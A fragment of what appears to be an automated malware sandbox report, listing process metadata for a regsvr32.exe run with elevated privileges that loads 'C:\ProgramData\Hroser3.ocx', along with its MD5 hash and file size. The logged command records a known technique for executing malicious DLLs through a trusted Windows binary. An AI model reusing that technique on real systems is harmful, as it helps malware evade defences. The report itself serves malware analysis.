                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:18:20:58
                                                                                                                                                    Start date:15/02/2022
                                                                                                                                                    Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:regsvr32 C:\ProgramData\Hroser3.ocx
                                                                                                                                                    Imagebase:0x1060000
                                                                                                                                                    File size:20992 bytes
                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high

                                                                                                                                                    No disassembly